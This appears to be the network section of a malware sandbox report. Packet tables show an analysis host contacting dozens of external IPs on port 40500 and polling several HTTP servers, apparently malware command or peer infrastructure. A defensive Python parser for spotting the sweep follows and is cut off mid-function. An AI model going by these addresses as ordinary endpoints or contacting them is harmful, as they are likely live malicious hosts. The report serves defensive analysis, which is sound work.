Sep 17, 2024 23:12:28.823868990 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823905945 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823914051 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823950052 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823957920 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823986053 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.829000950 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.829052925 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:29.554887056 CEST  40500     49808     151.242.54.207   192.168.2.4
Sep 17, 2024 23:12:29.556041956 CEST  49808     40500     192.168.2.4      151.242.54.207
Sep 17, 2024 23:12:33.400969982 CEST  49819     40500     192.168.2.4      91.246.92.22
Sep 17, 2024 23:12:33.406198978 CEST  40500     49819     91.246.92.22     192.168.2.4
Sep 17, 2024 23:12:33.406287909 CEST  49819     40500     192.168.2.4      91.246.92.22
Sep 17, 2024 23:12:33.419585943 CEST  49819     40500     192.168.2.4      91.246.92.22
Sep 17, 2024 23:12:33.424668074 CEST  40500     49819     91.246.92.22     192.168.2.4
Sep 17, 2024 23:12:33.424750090 CEST  49819     40500     192.168.2.4      91.246.92.22
Sep 17, 2024 23:12:33.429759979 CEST  40500     49819     91.246.92.22     192.168.2.4
Sep 17, 2024 23:12:33.446604967 CEST  49819     40500     192.168.2.4      91.246.92.22
Sep 17, 2024 23:12:33.493465900 CEST  40500     49819     91.246.92.22     192.168.2.4
Sep 17, 2024 23:12:34.912028074 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:34.912336111 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.281239986 CEST  40500     49811     5.235.246.49     192.168.2.4
Sep 17, 2024 23:12:35.281698942 CEST  40500     49811     5.235.246.49     192.168.2.4
Sep 17, 2024 23:12:35.281900883 CEST  40500     49811     5.235.246.49     192.168.2.4
Sep 17, 2024 23:12:35.282010078 CEST  49811     40500     192.168.2.4      5.235.246.49
Sep 17, 2024 23:12:35.282010078 CEST  49811     40500     192.168.2.4      5.235.246.49
Sep 17, 2024 23:12:35.284437895 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.284482002 CEST  49811     40500     192.168.2.4      5.235.246.49
Sep 17, 2024 23:12:35.284488916 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.284538031 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.284563065 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.284993887 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.288481951 CEST  40500     49811     5.235.246.49     192.168.2.4
Sep 17, 2024 23:12:35.290528059 CEST  40500     49811     5.235.246.49     192.168.2.4
Sep 17, 2024 23:12:35.290554047 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986341000 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986388922 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986409903 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986664057 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986689091 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986706018 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986722946 CEST  80        49820     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:35.986821890 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.986821890 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.986821890 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.988200903 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:35.988267899 CEST  49820     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:38.023427010 CEST  49821     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:38.028389931 CEST  80        49821     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:38.028450966 CEST  49821     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:38.028651953 CEST  49821     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:38.033406973 CEST  80        49821     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:38.443094015 CEST  49822     40500     192.168.2.4      79.170.184.222
Sep 17, 2024 23:12:38.448179007 CEST  40500     49822     79.170.184.222   192.168.2.4
Sep 17, 2024 23:12:38.449022055 CEST  49822     40500     192.168.2.4      79.170.184.222
Sep 17, 2024 23:12:38.450015068 CEST  49822     40500     192.168.2.4      79.170.184.222
Sep 17, 2024 23:12:38.455420971 CEST  40500     49822     79.170.184.222   192.168.2.4
Sep 17, 2024 23:12:38.455485106 CEST  49822     40500     192.168.2.4      79.170.184.222
Sep 17, 2024 23:12:38.456450939 CEST  49822     40500     192.168.2.4      79.170.184.222
Sep 17, 2024 23:12:38.461096048 CEST  40500     49822     79.170.184.222   192.168.2.4
Sep 17, 2024 23:12:38.509538889 CEST  40500     49822     79.170.184.222   192.168.2.4
Sep 17, 2024 23:12:38.728172064 CEST  80        49821     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:38.729098082 CEST  49821     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:39.727009058 CEST  40500     49813     109.200.174.222  192.168.2.4
Sep 17, 2024 23:12:39.727222919 CEST  49813     40500     192.168.2.4      109.200.174.222
Sep 17, 2024 23:12:40.755122900 CEST  49821     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:40.755361080 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:40.760368109 CEST  80        49821     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:40.760441065 CEST  49821     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:40.760557890 CEST  80        49823     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:40.760632992 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:40.760751009 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:40.766241074 CEST  80        49823     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:41.466754913 CEST  80        49823     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:41.467262030 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:43.472879887 CEST  49824     40500     192.168.2.4      95.59.118.94
Sep 17, 2024 23:12:43.489656925 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:43.489867926 CEST  49825     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:43.831474066 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:44.085017920 CEST  40500     49824     95.59.118.94     192.168.2.4
Sep 17, 2024 23:12:44.085028887 CEST  80        49825     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:44.085040092 CEST  80        49823     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:44.085247040 CEST  49824     40500     192.168.2.4      95.59.118.94
Sep 17, 2024 23:12:44.085854053 CEST  49825     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:44.085854053 CEST  49825     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:44.085875988 CEST  80        49823     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:44.085949898 CEST  49823     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:44.088418961 CEST  49824     40500     192.168.2.4      95.59.118.94
Sep 17, 2024 23:12:44.090631008 CEST  80        49825     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:44.093488932 CEST  40500     49824     95.59.118.94     192.168.2.4
Sep 17, 2024 23:12:44.093560934 CEST  49824     40500     192.168.2.4      95.59.118.94
Sep 17, 2024 23:12:44.097110033 CEST  49824     40500     192.168.2.4      95.59.118.94
Sep 17, 2024 23:12:44.098409891 CEST  40500     49824     95.59.118.94     192.168.2.4
Sep 17, 2024 23:12:44.145685911 CEST  40500     49824     95.59.118.94     192.168.2.4
Sep 17, 2024 23:12:44.680017948 CEST  40500     49815     213.230.126.39   192.168.2.4
Sep 17, 2024 23:12:44.680084944 CEST  49815     40500     192.168.2.4      213.230.126.39
Sep 17, 2024 23:12:44.777846098 CEST  80        49825     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:44.777939081 CEST  49825     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:46.801721096 CEST  49825     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:46.801991940 CEST  49826     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:46.807009935 CEST  80        49826     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:46.807121992 CEST  49826     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:46.807213068 CEST  49826     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:46.807260036 CEST  80        49825     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:46.807306051 CEST  49825     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:46.812207937 CEST  80        49826     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:47.533663988 CEST  80        49826     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:47.533844948 CEST  49826     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:49.113404036 CEST  49827     40500     192.168.2.4      2.176.184.81
Sep 17, 2024 23:12:49.118777990 CEST  40500     49827     2.176.184.81     192.168.2.4
Sep 17, 2024 23:12:49.119450092 CEST  49827     40500     192.168.2.4      2.176.184.81
Sep 17, 2024 23:12:49.120564938 CEST  49827     40500     192.168.2.4      2.176.184.81
Sep 17, 2024 23:12:49.125507116 CEST  40500     49827     2.176.184.81     192.168.2.4
Sep 17, 2024 23:12:49.127433062 CEST  49827     40500     192.168.2.4      2.176.184.81
Sep 17, 2024 23:12:49.128313065 CEST  49827     40500     192.168.2.4      2.176.184.81
Sep 17, 2024 23:12:49.132262945 CEST  40500     49827     2.176.184.81     192.168.2.4
Sep 17, 2024 23:12:49.173525095 CEST  40500     49827     2.176.184.81     192.168.2.4
Sep 17, 2024 23:12:49.762367964 CEST  40500     49818     194.93.26.70     192.168.2.4
Sep 17, 2024 23:12:49.762428045 CEST  49818     40500     192.168.2.4      194.93.26.70
Sep 17, 2024 23:12:50.678517103 CEST  49803     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:50.678832054 CEST  49828     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:50.683809042 CEST  80        49803     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:50.683836937 CEST  80        49828     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:50.683896065 CEST  49828     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:50.684051037 CEST  49828     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:50.689387083 CEST  80        49828     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:51.008256912 CEST  40500     49827     2.176.184.81     192.168.2.4
Sep 17, 2024 23:12:51.008348942 CEST  49827     40500     192.168.2.4      2.176.184.81
Sep 17, 2024 23:12:51.404925108 CEST  80        49828     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:51.407500982 CEST  49828     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:53.427396059 CEST  49828     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:53.427757025 CEST  49829     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:53.434288025 CEST  80        49828     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:53.434379101 CEST  49828     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:53.434393883 CEST  80        49829     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:53.434468031 CEST  49829     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:53.434623957 CEST  49829     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:53.440577984 CEST  80        49829     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:54.129080057 CEST  49830     40500     192.168.2.4      5.233.220.4
Sep 17, 2024 23:12:54.134042025 CEST  40500     49830     5.233.220.4      192.168.2.4
Sep 17, 2024 23:12:54.135077000 CEST  49830     40500     192.168.2.4      5.233.220.4
Sep 17, 2024 23:12:54.136496067 CEST  49830     40500     192.168.2.4      5.233.220.4
Sep 17, 2024 23:12:54.141452074 CEST  40500     49830     5.233.220.4      192.168.2.4
Sep 17, 2024 23:12:54.143565893 CEST  49830     40500     192.168.2.4      5.233.220.4
Sep 17, 2024 23:12:54.144021034 CEST  49830     40500     192.168.2.4      5.233.220.4
Sep 17, 2024 23:12:54.148442030 CEST  40500     49830     5.233.220.4      192.168.2.4
Sep 17, 2024 23:12:54.150146008 CEST  80        49829     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:54.150335073 CEST  49829     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:54.193593979 CEST  40500     49830     5.233.220.4      192.168.2.4
Sep 17, 2024 23:12:54.811352015 CEST  40500     49819     91.246.92.22     192.168.2.4
Sep 17, 2024 23:12:54.815378904 CEST  49819     40500     192.168.2.4      91.246.92.22
Sep 17, 2024 23:12:56.176781893 CEST  49829     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:56.177052975 CEST  49831     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:56.182873011 CEST  80        49831     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:56.182955027 CEST  49831     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:56.183052063 CEST  49831     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:56.183196068 CEST  80        49829     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:56.183355093 CEST  49829     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:56.188163996 CEST  80        49831     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:56.870342970 CEST  80        49831     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:56.871464968 CEST  49831     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:58.896806955 CEST  49831     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:58.897732973 CEST  49832     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:58.902276039 CEST  80        49831     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:58.902997971 CEST  80        49832     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:58.903134108 CEST  49831     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:58.903194904 CEST  49832     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:58.903496981 CEST  49832     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:58.908679008 CEST  80        49832     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:59.161263943 CEST  49833     40500     192.168.2.4      5.190.248.13
Sep 17, 2024 23:12:59.166320086 CEST  40500     49833     5.190.248.13     192.168.2.4
Sep 17, 2024 23:12:59.166397095 CEST  49833     40500     192.168.2.4      5.190.248.13
Sep 17, 2024 23:12:59.170533895 CEST  49833     40500     192.168.2.4      5.190.248.13
Sep 17, 2024 23:12:59.175407887 CEST  40500     49833     5.190.248.13     192.168.2.4
Sep 17, 2024 23:12:59.175468922 CEST  49833     40500     192.168.2.4      5.190.248.13
Sep 17, 2024 23:12:59.221374989 CEST  40500     49833     5.190.248.13     192.168.2.4
Sep 17, 2024 23:12:59.606447935 CEST  80        49832     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:59.607089996 CEST  49832     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:59.827030897 CEST  40500     49822     79.170.184.222   192.168.2.4
Sep 17, 2024 23:12:59.827104092 CEST  49822     40500     192.168.2.4      79.170.184.222
Sep 17, 2024 23:13:01.631660938 CEST  49832     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:01.632065058 CEST  49834     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:01.637567997 CEST  80        49834     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:01.637590885 CEST  80        49832     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:01.637631893 CEST  49834     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:01.637656927 CEST  49832     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:01.637963057 CEST  49834     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:01.642982006 CEST  80        49834     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:02.354104042 CEST  80        49834     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:02.354191065 CEST  49834     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:03.240053892 CEST  49826     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:13:03.240309000 CEST  49834     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:03.251307964 CEST  80        49826     91.202.233.141   192.168.2.4
Sep 17, 2024 23:13:03.251355886 CEST  49826     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:13:03.251451015 CEST  80        49834     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:03.251488924 CEST  49834     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:04.191715956 CEST  49835     40500     192.168.2.4      151.234.69.79
Sep 17, 2024 23:13:04.196665049 CEST  40500     49835     151.234.69.79    192.168.2.4
Sep 17, 2024 23:13:04.196748018 CEST  49835     40500     192.168.2.4      151.234.69.79
Sep 17, 2024 23:13:04.197988987 CEST  49835     40500     192.168.2.4      151.234.69.79
Sep 17, 2024 23:13:04.203119993 CEST  40500     49835     151.234.69.79    192.168.2.4
Sep 17, 2024 23:13:04.203176022 CEST  49835     40500     192.168.2.4      151.234.69.79
Sep 17, 2024 23:13:04.206500053 CEST  49835     40500     192.168.2.4      151.234.69.79
Sep 17, 2024 23:13:04.208120108 CEST  40500     49835     151.234.69.79    192.168.2.4
Sep 17, 2024 23:13:04.253458977 CEST  40500     49835     151.234.69.79    192.168.2.4
Sep 17, 2024 23:13:04.380382061 CEST  49836     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:04.385323048 CEST  80        49836     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:04.385425091 CEST  49836     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:04.385543108 CEST  49836     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:04.390347004 CEST  80        49836     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:05.072268963 CEST  80        49836     185.215.113.66   192.168.2.4
Sep 17, 2024 23:13:05.072324991 CEST  49836     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:13:05.497745991 CEST  40500     49824     95.59.118.94     192.168.2.4
Sep 17, 2024 23:13:05.497947931 CEST  49824     40500     192.168.2.4      95.59.118.94
Sep 17, 2024 23:13:08.116410971 CEST  49837     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:13:08.134638071 CEST  80        49837     77.91.77.92      192.168.2.4
Sep 17, 2024 23:13:08.134740114 CEST  49837     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:13:08.134874105 CEST  49837     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:13:08.161170959 CEST  80        49837     77.91.77.92      192.168.2.4
Sep 17, 2024 23:13:09.206978083 CEST  49838     40500     192.168.2.4      5.133.123.159
Sep 17, 2024 23:13:09.254283905 CEST  40500     49838     5.133.123.159    192.168.2.4
Sep 17, 2024 23:13:09.254355907 CEST  49838     40500     192.168.2.4      5.133.123.159
Sep 17, 2024 23:13:09.255374908 CEST  49838     40500     192.168.2.4      5.133.123.159
Sep 17, 2024 23:13:09.269211054 CEST  49838     40500     192.168.2.4      5.133.123.159
Sep 17, 2024 23:13:09.534617901 CEST  49838     40500     192.168.2.4      5.133.123.159
Sep 17, 2024 23:13:09.604866028 CEST  40500     49838     5.133.123.159    192.168.2.4
Sep 17, 2024 23:13:09.604882002 CEST  40500     49838     5.133.123.159    192.168.2.4
Sep 17, 2024 23:13:09.922728062 CEST  80        49837     77.91.77.92      192.168.2.4
                                            Sep 17, 2024 23:13:09.923769951 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:09.923883915 CEST4983780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:09.949393034 CEST804983777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:11.942872047 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:12.010977030 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:12.011154890 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:12.011240005 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:12.064850092 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:13.778429985 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:13.779439926 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:13.779511929 CEST4983980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:13:13.789038897 CEST804983977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:13:15.567642927 CEST40500498305.233.220.4192.168.2.4
                                            Sep 17, 2024 23:13:15.570318937 CEST4983040500192.168.2.45.233.220.4
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 17, 2024 23:09:18.095591068 CEST  59145  40500  192.168.2.4  84.54.122.14
Sep 17, 2024 23:09:23.161854982 CEST  59145  40500  192.168.2.4  178.151.4.209
Sep 17, 2024 23:09:28.177603960 CEST  59145  40500  192.168.2.4  195.181.62.220
Sep 17, 2024 23:09:33.235647917 CEST  59145  40500  192.168.2.4  2.189.25.176
Sep 17, 2024 23:09:38.241848946 CEST  59145  40500  192.168.2.4  86.102.56.226
Sep 17, 2024 23:09:43.241811991 CEST  59145  40500  192.168.2.4  2.190.124.23
Sep 17, 2024 23:09:48.239314079 CEST  59145  40500  192.168.2.4  10.102.10.21
Sep 17, 2024 23:09:53.262038946 CEST  59145  40500  192.168.2.4  100.66.253.251
Sep 17, 2024 23:09:58.255064011 CEST  59145  40500  192.168.2.4  105.106.52.97
Sep 17, 2024 23:10:03.308803082 CEST  59145  40500  192.168.2.4  217.30.170.10
Sep 17, 2024 23:10:08.302854061 CEST  59145  40500  192.168.2.4  217.30.162.37
Sep 17, 2024 23:10:13.319220066 CEST  59145  40500  192.168.2.4  81.195.238.130
Sep 17, 2024 23:10:18.318553925 CEST  59145  40500  192.168.2.4  178.130.83.254
Sep 17, 2024 23:10:23.335541010 CEST  59145  40500  192.168.2.4  46.100.121.146
Sep 17, 2024 23:10:28.348341942 CEST  59145  40500  192.168.2.4  37.255.23.100
Sep 17, 2024 23:10:33.348572969 CEST  59145  40500  192.168.2.4  87.237.234.24
Sep 17, 2024 23:10:38.364094019 CEST  59145  40500  192.168.2.4  178.253.109.195
Sep 17, 2024 23:10:43.380317926 CEST  59145  40500  192.168.2.4  5.236.253.124
Sep 17, 2024 23:10:48.397243977 CEST  59145  40500  192.168.2.4  213.230.127.213
Sep 17, 2024 23:10:53.411549091 CEST  59145  40500  192.168.2.4  82.194.13.95
Sep 17, 2024 23:10:58.514940977 CEST  59145  40500  192.168.2.4  89.43.145.18
Sep 17, 2024 23:11:03.520358086 CEST  59145  40500  192.168.2.4  79.165.23.131
Sep 17, 2024 23:11:08.536109924 CEST  59145  40500  192.168.2.4  188.213.178.116
Sep 17, 2024 23:11:13.541304111 CEST  59145  40500  192.168.2.4  151.240.79.133
Sep 17, 2024 23:11:18.551662922 CEST  59145  40500  192.168.2.4  91.218.161.58
Sep 17, 2024 23:11:23.570591927 CEST  59145  40500  192.168.2.4  178.88.111.20
Sep 17, 2024 23:11:28.602590084 CEST  59145  40500  192.168.2.4  37.151.125.109
Sep 17, 2024 23:11:33.598653078 CEST  59145  40500  192.168.2.4  100.67.22.76
Sep 17, 2024 23:11:38.614980936 CEST  59145  40500  192.168.2.4  89.249.62.14
Sep 17, 2024 23:11:43.614862919 CEST  59145  40500  192.168.2.4  92.47.27.126
Sep 17, 2024 23:11:48.662898064 CEST  59145  40500  192.168.2.4  37.151.162.116
Sep 17, 2024 23:11:53.660979033 CEST  59145  40500  192.168.2.4  89.36.181.43
Sep 17, 2024 23:11:58.676865101 CEST  59145  40500  192.168.2.4  178.45.178.213
Sep 17, 2024 23:12:03.696357012 CEST  59145  40500  192.168.2.4  2.185.224.76
Sep 17, 2024 23:12:08.708132029 CEST  59145  40500  192.168.2.4  80.80.222.130
Sep 17, 2024 23:12:13.708015919 CEST  59145  40500  192.168.2.4  151.235.83.141
Sep 17, 2024 23:12:18.707808018 CEST  59145  40500  192.168.2.4  2.185.144.157
Sep 17, 2024 23:12:23.724097013 CEST  59145  40500  192.168.2.4  78.39.225.27
Sep 17, 2024 23:12:28.739573956 CEST  59145  40500  192.168.2.4  37.228.65.185
Sep 17, 2024 23:12:33.855828047 CEST  59145  40500  192.168.2.4  178.45.178.213
Sep 17, 2024 23:12:38.848778963 CEST  59145  40500  192.168.2.4  149.54.47.90
Sep 17, 2024 23:12:43.864557981 CEST  59145  40500  192.168.2.4  37.150.142.35
Sep 17, 2024 23:12:48.864965916 CEST  59145  40500  192.168.2.4  5.232.85.255
Sep 17, 2024 23:12:53.879962921 CEST  59145  40500  192.168.2.4  188.215.175.89
Sep 17, 2024 23:12:58.897691011 CEST  59145  40500  192.168.2.4  100.109.48.43
Sep 17, 2024 23:13:03.911230087 CEST  59145  40500  192.168.2.4  109.74.67.96
Sep 17, 2024 23:13:08.927618027 CEST  59145  40500  192.168.2.4  203.142.81.102
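The packet tables above print each row with its columns run together, and the digit runs are genuinely ambiguous: 192.168.2.4 followed by 151.234.69.79 can also be read as 192.168.2.41 and 51.234.69.79. The Python below is an added example, not part of the Joe Sandbox report, that recovers the columns by accepting only the reading in which exactly one side of the row is the analysis host 192.168.2.4 and that side's port is ephemeral (the Windows dynamic range 49152-65535 is an assumption about the guest), then groups outbound rows by port pair to surface the pattern visible in the UDP table: one fixed source port, 59145, sending to port 40500 on a different host roughly every five seconds. The sample rows are copied from the tables above; the ValueError on an ambiguous row is deliberate so that a misread address never lands in an IOC list.

```python
"""Recover the columns of Joe Sandbox packet rows whose fields were fused on
extraction, then flag a fixed-source-port sweep.  Added example; not Joe Sandbox code."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

LOCAL_IP = "192.168.2.4"            # the analysis VM, taken from the report
EPHEMERAL = range(49152, 65536)     # Windows dynamic port range (assumption: Windows guest)

# Constructed input: rows copied verbatim from the report's TCP and UDP packet tables.
SAMPLE_ROWS = """\
Sep 17, 2024 23:13:03.251307964 CEST804982691.202.233.141192.168.2.4
Sep 17, 2024 23:13:03.251355886 CEST4982680192.168.2.491.202.233.141
Sep 17, 2024 23:13:04.191715956 CEST4983540500192.168.2.4151.234.69.79
Sep 17, 2024 23:13:15.567642927 CEST40500498305.233.220.4192.168.2.4
Sep 17, 2024 23:09:18.095591068 CEST5914540500192.168.2.484.54.122.14
Sep 17, 2024 23:09:23.161854982 CEST5914540500192.168.2.4178.151.4.209
Sep 17, 2024 23:09:28.177603960 CEST5914540500192.168.2.4195.181.62.220
Sep 17, 2024 23:09:33.235647917 CEST5914540500192.168.2.42.189.25.176
Sep 17, 2024 23:09:38.241848946 CEST5914540500192.168.2.486.102.56.226
Sep 17, 2024 23:09:43.241811991 CEST5914540500192.168.2.42.190.124.23
"""

ROW_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) CEST(\d[\d.]*)$")


def valid_ip(s):
    """Dotted quad, every octet 0-255 with no leading zero (as the report prints them)."""
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and (p == "0" or p[0] != "0") and int(p) <= 255 for p in parts)


def valid_port(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def split_row(row, local_ip=LOCAL_IP):
    """Return the unique (timestamp, src_port, dst_port, src_ip, dst_ip) reading of a
    fused row.  A reading is accepted only if exactly one side is the sandbox host and
    that side's port is ephemeral; zero or several readings raise ValueError."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    head, frac = m.group(1).rsplit(".", 1)          # report prints 9 fractional digits
    ts = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    rest = m.group(2)
    found = []
    for i in range(1, 6):                           # source port: 1-5 digits
        for j in range(1, 6):                       # destination port: 1-5 digits
            p1, p2, tail = rest[:i], rest[i:i + j], rest[i + j:]
            if not (valid_port(p1) and valid_port(p2)):
                continue
            for k in range(7, len(tail) - 6):       # shortest IPv4 text is 7 chars
                ip1, ip2 = tail[:k], tail[k:]
                if not (valid_ip(ip1) and valid_ip(ip2)):
                    continue
                if (ip1 == local_ip) == (ip2 == local_ip):   # both or neither local
                    continue
                local_port = int(p1) if ip1 == local_ip else int(p2)
                if local_port in EPHEMERAL:
                    found.append((int(p1), int(p2), ip1, ip2))
    if len(found) != 1:
        raise ValueError(f"{len(found)} readings for {rest!r}: {found}")
    sp, dp, sip, dip = found[0]
    return {"ts": ts, "src_port": sp, "dst_port": dp, "src_ip": sip, "dst_ip": dip}


def parse_rows(text, local_ip=LOCAL_IP):
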